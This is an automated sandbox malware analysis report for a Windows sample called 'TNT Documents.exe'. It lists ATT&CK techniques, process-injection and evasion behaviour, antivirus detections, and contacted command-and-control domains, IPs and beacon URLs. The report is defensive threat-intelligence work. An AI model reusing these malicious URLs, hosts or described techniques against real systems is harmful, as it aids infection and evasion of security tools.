          Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 612 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 221 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 612 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | System Information Discovery 112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 4 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 13 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Timestomp 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | File Deletion 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

          Behavior Graph


          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          Behavior Graph ID: 532859 | Sample: TNT Documents.exe | Startdate: 02/12/2021 | Architecture: WINDOWS | Score: 100

          Start
            DNS/IP: www.viavelleiloes.online; www.projectcentered.com; 5 other IPs or domains
            Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures
            started: TNT Documents.exe
              dropped: C:\Users\user\...\TNT Documents.exe.log, ASCII
              Signature: Injects a PE file into a foreign processes
              started: TNT Documents.exe
              started: TNT Documents.exe
                Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                injected: explorer.exe
                  DNS/IP: metronixmedical.com 119.18.54.99, 49820, 80 PUBLIC-DOMAIN-REGISTRYUS India; cortepuroiberico.com 51.255.30.106, 49794, 80 OVHFR France; 5 other IPs or domains
                  Signature: System process connects to network (likely due to code injection or exploit)
                  started: mstsc.exe
                    Signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                    started: cmd.exe
                      started: conhost.exe

          Screenshots


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          TNT Documents.exe | 47% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
          TNT Documents.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          7.2.TNT Documents.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          7.0.TNT Documents.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          7.0.TNT Documents.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          7.0.TNT Documents.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          coached.info | 0% | Virustotal |

          URLs

          Source | Detection | Scanner | Label
          http://www.fontbureau.comI.TTF | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.sajatypeworks.comus4 | 0% | Avira URL Cloud | safe
          http://www.coached.info/how6/?iN9tFB=ViiEyPWfYSojbIItq3CvR44gsAi5K3j61FSCtvXBJNhPIgkqJAzuFuyRGTnTAJ9C7DX1GVbTZg==&4h=7n_DRJGxnRd | 0% | Avira URL Cloud | safe
          http://www.founder.com.cn/cnar | 0% | Avira URL Cloud | safe
          http://www.zhongyicts.com.cn9 | 0% | Avira URL Cloud | safe
          http://www.jiyu-kobo.co.jp/soft | 0% | URL Reputation | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.founder.c | 0% | URL Reputation | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.founder.com.cn/cnG | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          www.floridanratraining.com/how6/ | 0% | Avira URL Cloud | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://fontfabrik.comx | 0% | Avira URL Cloud | safe
          http://www.metronixmedical.com/how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&4h=7n_DRJGxnRd | 0% | Avira URL Cloud | safe
          http://www.jiyu-kobo.co.jp/slnt | 0% | Avira URL Cloud | safe
          http://www.urwpp.de2 | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/Y0 | 0% | URL Reputation | safe
          http://www.fontbureau.comF( | 0% | Avira URL Cloud | safe
          http://www.founder.com.cn/cna | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/( | 0% | URL Reputation | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.sajatypeworks.coma | 0% | URL Reputation | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.founder.com.cn/cnaX | 0% | Avira URL Cloud | safe
          http://www.urwpp.de | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe
          http://www.fontbureau.com= | 0% | Avira URL Cloud | safe
          http://www.fontbureau.comcomo? | 0% | Avira URL Cloud | safe
          http://www.jiyu-kobo.co.jp/M | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/F | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/jp/ | 0% | URL Reputation | safe
          http://www.fontbureau.comd | 0% | URL Reputation | safe
          http://www.fonts.comX | 0% | URL Reputation | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.monotype. | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/.comp | 0% | Avira URL Cloud | safe
          http://www.tiro.comU | 0% | Avira URL Cloud | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          http://www.specialtyplastics.online/how6/?iN9tFB=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnwHz38WooRcfQb4d5g==&4h=7n_DRJGxnRd | 100% | Avira URL Cloud | malware
          http://www.urwpp.der | 0% | Avira URL Cloud | safe
          http://www.fontbureau.como | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cno. | 0% | URL Reputation | safe
          http://www.fontbureau.comals | 0% | URL Reputation | safe
          http://www.tiro.comic | 0% | URL Reputation | safe
          http://www.fontbureau.comitud | 0% | URL Reputation | safe
          http://www.cortepuroiberico.com/how6/?iN9tFB=6MRiWtHRwAFwDvhVcJAGZD0p4fLcIEcyVDy1Zth0WcmsI64tqWfeZe6Y2j9BcQs7bzR6A9198A==&4h=7n_DRJGxnRd | 100% | Avira URL Cloud | malware

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          metronixmedical.com | 119.18.54.99 | true | true | | unknown
          www.functionalsoft.com | 74.208.236.210 | true | false | | unknown
          coached.info | 34.102.136.180 | true | false | | unknown
          cortepuroiberico.com | 51.255.30.106 | true | true | | unknown
          www.specialtyplastics.online | 209.17.116.163 | true | true | | unknown
          projectcentered.com | 158.69.116.156 | true | true | | unknown
          www.pirosconsulting.com | unknown | unknown | true | | unknown
          www.metronixmedical.com | unknown | unknown | true | | unknown
          www.pentagonpublishers.com | unknown | unknown | true | | unknown
          www.floridanratraining.com | unknown | unknown | true | | unknown
          www.viavelleiloes.online | unknown | unknown | true | | unknown
          www.cortepuroiberico.com | unknown | unknown | true | | unknown
          www.coached.info | unknown | unknown | true | | unknown
          www.projectcentered.com | unknown | unknown | true | | unknown

                                    Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.coached.info/how6/?iN9tFB=ViiEyPWfYSojbIItq3CvR44gsAi5K3j61FSCtvXBJNhPIgkqJAzuFuyRGTnTAJ9C7DX1GVbTZg==&4h=7n_DRJGxnRd | false | Avira URL Cloud: safe | unknown
          www.floridanratraining.com/how6/ | true | Avira URL Cloud: safe | low
          http://www.metronixmedical.com/how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&4h=7n_DRJGxnRd | true | Avira URL Cloud: safe | unknown
          http://www.specialtyplastics.online/how6/?iN9tFB=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnwHz38WooRcfQb4d5g==&4h=7n_DRJGxnRd | true | Avira URL Cloud: malware | unknown
          http://www.cortepuroiberico.com/how6/?iN9tFB=6MRiWtHRwAFwDvhVcJAGZD0p4fLcIEcyVDy1Zth0WcmsI64tqWfeZe6Y2j9BcQs7bzR6A9198A==&4h=7n_DRJGxnRd | true | Avira URL Cloud: malware | unknown

                                    URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://www.fontbureau.com/designersG | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | false | | high
          http://www.fontbureau.comI.TTF | TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers/? | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | false | | high
          http://www.founder.com.cn/cn/bThe | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers? | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | false | | high
          http://www.sajatypeworks.comus4 | TNT Documents.exe, 00000000.00000003.255624814.000000000061D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.founder.com.cn/cnar | TNT Documents.exe, 00000000.00000003.258154475.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258083706.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258199310.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258119764.0000000005481000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.zhongyicts.com.cn9 | TNT Documents.exe, 00000000.00000003.259236141.000000000547E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.jiyu-kobo.co.jp/soft | TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.tiro.com | TNT Documents.exe, 00000000.00000003.260165692.000000000548B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | false | | high
          http://www.founder.c | TNT Documents.exe, 00000000.00000003.258709539.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258597321.0000000005474000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.goodfont.co.kr | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.founder.com.cn/cnG | TNT Documents.exe, 00000000.00000003.257969438.0000000005473000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.sajatypeworks.com | TNT Documents.exe, 00000000.00000003.255624814.000000000061D000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.typography.netD | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.founder.com.cn/cn/cThe | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.galapagosdesign.com/staff/dennis.htm | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://fontfabrik.com | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256409196.00000000054AD000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://fontfabrik.comx | TNT Documents.exe, 00000000.00000003.256409196.00000000054AD000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.jiyu-kobo.co.jp/slnt | TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260815877.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260888751.0000000005475000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.urwpp.de2 | TNT Documents.exe, 00000000.00000003.264211544.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264143037.000000000548E000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264092600.000000000548E000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/ | TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | false | | high
          http://www.galapagosdesign.com/DPlease | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.jiyu-kobo.co.jp/Y0 | TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.comF( | TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
          http://www.founder.com.cn/cna | TNT Documents.exe, 00000000.00000003.257969438.0000000005473000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.257895168.0000000005473000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.jiyu-kobo.co.jp/( | TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fonts.com | TNT Documents.exe, 00000000.00000003.256191173.00000000054AD000.00000004.00000001.sdmp | false | | high
          http://www.sandoll.co.kr | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.sajatypeworks.coma | TNT Documents.exe, 00000000.00000003.255624814.000000000061D000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.urwpp.deDPlease | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.founder.com.cn/cnaX | TNT Documents.exe, 00000000.00000003.257895168.0000000005473000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.urwpp.de | TNT Documents.exe, 00000000.00000003.267219915.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267251164.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264211544.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264583046.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264143037.000000000548E000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267332900.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267168059.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267369494.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264092600.000000000548E000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264299140.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267284938.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264398711.000000000548D000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.zhongyicts.com.cn | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | TNT Documents.exe, 00000000.00000002.294032469.0000000002381000.00000004.00000001.sdmp | false | | high
          http://www.sakkal.com | TNT Documents.exe, 00000000.00000003.262108739.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262382693.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262663913.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262518900.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262298913.0000000005482000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com= | TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
          http://www.fontbureau.com/designerss | TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | false | | high
          http://www.autoitscript.com/autoit3/J | explorer.exe, 0000000B.00000000.339769433.0000000006840000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.319305560.0000000006840000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.302126756.0000000006840000.00000004.00000001.sdmp | false | | high
          http://www.apache.org/licenses/LICENSE-2.0 | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | false | | high
          http://www.fontbureau.com | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | false | | high
          http://www.fontbureau.comcomo? | TNT Documents.exe, 00000000.00000003.292077416.0000000005470000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.299918720.0000000005470000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.jiyu-kobo.co.jp/M | TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp | false
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.jiyu-kobo.co.jp/FTNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.jiyu-kobo.co.jp/jp/TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.comdTNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fonts.comXTNT Documents.exe, 00000000.00000003.256034110.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256133822.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.255970673.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256207995.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256191173.00000000054AD000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.carterandcone.comlTNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers/cabarga.htmlNTNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://www.founder.com.cn/cnTNT Documents.exe, 00000000.00000003.257969438.0000000005473000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258199310.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258119764.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.257895168.0000000005473000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.fontbureau.com/designers/frere-jones.htmlTNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265542932.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265913845.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265491333.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265612150.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265991532.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265777624.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265683380.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265846476.0000000005482000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://www.monotype.TNT Documents.exe, 00000000.00000003.265542932.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265384324.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265335700.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265491333.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265612150.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265777624.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265683380.0000000005482000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.jiyu-kobo.co.jp/.compTNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.tiro.comUTNT Documents.exe, 00000000.00000003.260239394.000000000548B000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260092488.000000000548B000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260165692.000000000548B000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.jiyu-kobo.co.jp/TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260815877.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260888751.0000000005475000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.urwpp.derTNT Documents.exe, 00000000.00000003.267219915.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267251164.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267168059.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267284938.0000000005482000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.fontbureau.comoTNT Documents.exe, 00000000.00000003.292077416.0000000005470000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.299918720.0000000005470000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.zhongyicts.com.cno.TNT Documents.exe, 00000000.00000003.259236141.000000000547E000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.fontbureau.com/designers8TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://www.fontbureau.comalsTNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.tiro.comicTNT Documents.exe, 00000000.00000003.260092488.000000000548B000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.fontbureau.com/designers/TNT Documents.exe, 00000000.00000003.264583046.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264654507.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264398711.000000000548D000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://www.fontbureau.comitudTNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
119.18.54.99 | metronixmedical.com | India | 394695 | PUBLIC-DOMAIN-REGISTRY (US) | true
34.102.136.180 | coached.info | United States | 15169 | GOOGLE (US) | false
51.255.30.106 | cortepuroiberico.com | France | 16276 | OVH (FR) | true
209.17.116.163 | www.specialtyplastics.online | United States | 55002 | DEFENSE-NET (US) | true

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 532859
Start date: 02.12.2021
Start time: 18:56:46
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 53s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: TNT Documents.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@9/1@10/4
EGA Information: Failed
HDC Information:
• Successful, ratio: 8.7% (good quality ratio 7.7%)
• Quality average: 72.4%
• Quality standard deviation: 32.8%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 108
• Number of non-executed functions: 170
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
